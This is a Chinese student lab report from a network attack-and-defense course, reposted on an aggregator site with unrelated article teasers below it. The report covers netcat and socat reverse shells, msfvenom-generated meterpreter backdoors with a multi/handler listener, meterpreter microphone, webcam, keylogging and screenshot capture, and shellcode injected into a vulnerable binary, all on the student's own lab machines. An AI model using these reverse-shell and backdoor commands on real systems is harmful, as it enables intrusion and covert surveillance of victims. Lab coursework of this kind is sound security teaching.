20232415 2025-2026-1 《网络与系统攻防技术》 实验二实验报告

news/2025/10/22 22:47:42/文章来源:https://www.cnblogs.com/shm0050/p/19159162

一、实验目的
(1)使用netcat获取主机操作Shell,通过cron启动某项任务
(2)使用socat获取主机操作Shell, 通过任务计划启动
(3)使用MSF meterpreter生成后门程序,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter获取主机的基础上获取其音频、摄像头、击键记录等后门
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
二、回答问题
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:攻击者构造陷阱:攻击者将后门程序(如木马、远控工具)伪装成看似正常的文件(如 “工作报表.exe”“照片压缩包.zip”,甚至伪造为 PDF/Word 图标但实际是可执行文件),通过邮件发送给目标用户,邮件内容可能伪装成 “领导通知”“客户资料” 等,诱导用户点击。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:注册表启动项,快捷方式劫持与启动文件夹
(3)Meterpreter有哪些给你印象深刻的功能?
答:屏幕截图,键盘记录,摄像头拍照
(4)如何发现自己有系统有没有被安装后门?
答:用Windows Defender、检查系统关键目录是否有陌生文件、检查是否有服务与驱动异常
三、实验环境
VMware+kali+Windows11
主机IP:192.168.1.108(中间有因实验地点更改而造成的变化)
image
kaliIP:192.168.52.131(中间有因实验地点更改而造成的变化)
image
附:关闭所有的防火墙和杀毒软件
四、实验内容
(1)使用netcat获取主机操作Shell,通过cron启动某项任务
打开PowerShell,输入指令./nc64.exe -l -p 2415执行可执行文件,监听2415端口
打开另一个PowerShell终端,查看监听情况
72ab8524412c8dc4ea47093ad5d0486
启动虚拟机,获取root权限后输入:nc 192.168.1.108 2415 -e /bin/sh,使虚拟机主动连接IP为192.168.1.108的主机的2415端口
即可使主机获得虚拟机的shell
a97c16b97ac6343b6990c020eda2240
(2)使用socat获取主机操作Shell, 通过任务计划启动
在主机中打开计算机管理,新建触发器与操作:
d713407d884eb961d1319745303e6d5
99147229e71bb45d209e57e38ba63d9
这样每次待机重启后都会收到终端的提示
f197424e0fbcf0f0065d24535f53db7
输入socat - tcp:192.168.1.108:2415,成功获取主机的shell
3c166f07c5a93c72eb5ec6380b12a50
(3)使用MSF meterpreter生成后门程序,利用ncat或socat传送到主机并运行获取主机Shell
在虚拟机中输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.51 LPORT=8888 -f exe > backdoor20232415.exe
d898e610db915b29a44fcc1ba4bf955
在主机终端上监听:
dfab56371af27e211924268bd16d860
在虚拟机上输入nc 192.168.1.108 2407 < 20232415backdoor.exe将生成的20232415backdoor.exe后门程序传过去
image
在kali上依次输入:msfconsole(打开msf控制台)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.131
set LPORT 2415
主动在主机上启动后门程序即可在kali上获得:
a69bbd7bd0d85cbc4983866e16a71a9
(即成功获取到主机的shell)
(4)使用MSF meterpreter获取主机的基础上获取其音频、摄像头、击键记录等后门
获取目标主机音频
在上一步的控制台中输入:record_mic进行录音
image
获取目标主机摄像头
输入:webcam_snap进行拍照
image
b513cbc6fe702205ac6a15832138dcc
获取目标主机键盘内容
输入:keyscan_start开始捕捉;输入:keyscan_dump结束捕捉
c37dc36f4aa819a9d707088076b1cac
获取目标主机屏幕内容
输入:screenshot
image
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
首先关闭地址随机化,设置堆栈可执行
2776ce2319f6a4897aa73c7852e72cf
输入msfvenom -p linux/x86/shell/reverse_nonx_tcp LHOST=192.168.52.131 LPORT=2415 -f c
image
将pwn1的返回地址开头覆盖上缓冲区的随意字符,用如下代码生成inputshm
image
一个终端运行pwn1
2e0f4745963a57e4dc9c80f4998f5de
另一个终端监听
eee45bc6c7c0048358a8b7298037056
攻击成功!
五、问题及解决方案:
问题一:msf平台获取shell进程卡住了,无法继续获取shell
解决方案:需要在主机上主动启动后门程序
问题二:在主机中运行20232415backdoor.exe不成功,显示有另一程序正在应用该后门
解决方案:在kali终端中退出nc 192.168.1.108 2415 < 20232415backdoor.exe
六、实验心得体会
本次实验有点复杂,但是还是比较有意思,在获取截图,摄像机等过程中比较有成就感;在做实验查资料的过程中能明显感到网络攻防课程的学问很深,很复杂,希望能在以后的学习过程中进一步提高自己的能力。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/943810.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

结对项目:四则运算生成器

双人合作项目 - 四则运算生成器 一、项目信息项目名称 双人合作项目-四则运算生成器课程所属班级 计科2班* 作业要求 作业要求链接作业目标 熟悉体会双人合作构建项目的流程,深入理解项目实现过程中的分工与交流的重要…

CSP-S2023

T4 CSP-S 2023 种树 显然答案有单调性,考虑二分答案 \(t\)。 二分有什么好处呢?就是可以知道每棵树最坏在哪天种才能达到 \(a_i\) 的高度。(不二分是做不到的,因为 \(x\) 是从 \(1\) 开始计数的。) 而这个部分显然…

Spring Boot 中全面解决跨域请求

什么是跨域请求(CORS) 跨域的概念 跨域是指浏览器出于安全考虑,限制了从不同源(协议,域名,端口任一不同)的服务器请求资源,这是浏览器的同源策略(Same-Origin Policy)所导致的。同源策略要求一下三个必须相同…

OpenTelemetry语义约定:规范可观测性数据,提升系统洞察力

在现代分布式系统中,可观测性(Observability)已成为保障系统健康和快速定位问题的关键。然而,随着微服务数量的增长和各种可观测性工具的涌现,如何统一和规范化指标(Metrics)、日志(Logs)和链路追踪(Traces)…

Serilog基于Seq开源框架实现日志分析

一、NuGet 包管理器中下载相关包SerilogSerilog.Sinks.Console(控制台输出)Serilog.Sinks.File(输出到文件)Serilog.Sinks.Seq(输出到Seq服务)二、搭建 Seq 日志服务 Docker命令行快速启动点击查看代码 // 启动项…

US$390 TabScan T6XENTRY C6 Diagnostic Tool Support DoIP J2534 PDU Passthru CANFD

**Revolutionizing Mercedes-Benz Diagnostics: The TabScan T6XENTRY C6 Diagnostic Tool** In the rapidly evolving world of automotive diagnostics, having the right tool can make the difference between a q…

10.20-10.26

10.20 gugugu 10.21 gugugu... 10.22 abc290f 发现实际可能对答案造成贡献的序列的和为\(2n-2\),于是我们通过插板法计算答案: \[\sum_{k=1}^n\dbinom{n}{k}\dbinom{n-3}{k-2}(n-k+1) \]然后化简,通过吸收恒等式和范…

20232421 2025-2026-1 《网络与系统攻防技术》实验二实验报告

1.实践内容 1.1 实践目标使用netcat获取主机操作Shell,cron启动某项任务(任务自定) 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主…

两两交换链表中的节点-leetcode

题目描述 给你一个链表,两两交换其中相邻的节点,并返回交换后链表的头节点。你必须在不修改节点内部的值的情况下完成本题(即,只能进行节点交换)。 示例 1:输入:head = [1,2,3,4] 输出:[2,1,4,3]示例 2: 输入…

算法第二章实践作业

1.随机选择数组中的一个元素作为基准值,将数组划分为三部分:小于基准值的元素(左子数组)、等于基准值的元素(中间部分)、大于基准值的元素(右子数组)。若左子数组的长度 ≥ k,则第 k小的元素一定在左子数组中…

解决homebrew下载报错问题

报错: Error: mysql-client@8.4: Failed to download resource "openssl@3.rb"Download failed: https://raw.githubusercontent.com/Homebrew/homebrew-core/5780e7787be0ee2813710acd974cd41d6b260860/Fo…

软考中级学习总结(5)

连接: (1)Theata连接:R 连接 S theata表示任意不等符 (2)等值连接:R连接S,要求属性相同 (3)自然连接:R连接S,要求R与S有一个/多个同名的属性 计算出RXS,选出其中R.A=S.A 的行 外连接: 1.左外连接(保左)…

软考中级学习总结(4)

知识产权 专利地域性:只在申请国领域内受保护 计算机软件著作权的主体:人 依据:《中华人民共和国著作权法》,《计算机软件保护条例》 计算机软件著作权客体:计算机程序以及有关文档 程序设计说明书 流程图 用户手…

docker: Error response from daemon: failed to set up container networking 解决办法

问题描述 docker: Error response from daemon: failed to set up container networking: failed to create endpoint yesplaymusic on network bridge: Unable to enable DIRECT ACCESS FILTERING - DROP rule: (ipta…

“化零为整”的智慧:内存池如何绕过系统调用和GC,构建性能的护城河

“化零为整”的智慧:内存池如何绕过系统调用和GC,构建性能的护城河内存池:精打细算的内存管家 在高性能系统(如网络服务器)的极致优化中,当处理器和I/O的瓶颈被逐一攻克后,内存管理便成为决定系统延迟和吞吐量的…

CSP-S36

10.2110.21 t1code嘻嘻 #include <bits/stdc++.h> #define ldb long double using namespace std; int x, y;signed main() {freopen("island.in", "r", stdin);freopen("island.out&q…

新学期每日总结(第13天)

今日 相较昨日 学习了布置数据库

解决一台hp probook 430G3笔记本无法实现win10关机网络唤醒

解决一台hp probook 430G3笔记本无法实现win10关机网络唤醒一台hp probook 430G3笔记本,bios已经设置网络唤醒到硬盘,并且网卡的设置也没什么问题,但关机之后网卡的灯不亮,用网络唤醒也不开机。 在惠普社区找到一篇…

P4765 [CERC2014] The Imp 解题笔记

原题链接 题面 商店里有 \(n\) 个魔术实体,每个实体都锁在一个特殊的魔术宝箱中。第 \(i\) 个宝箱(和其中的实体)的售价为 \(c_i\)个金币,而其中实体的价值相当于 \(v_i\) 个金币。 然而像你这样的凡人,只能安全地…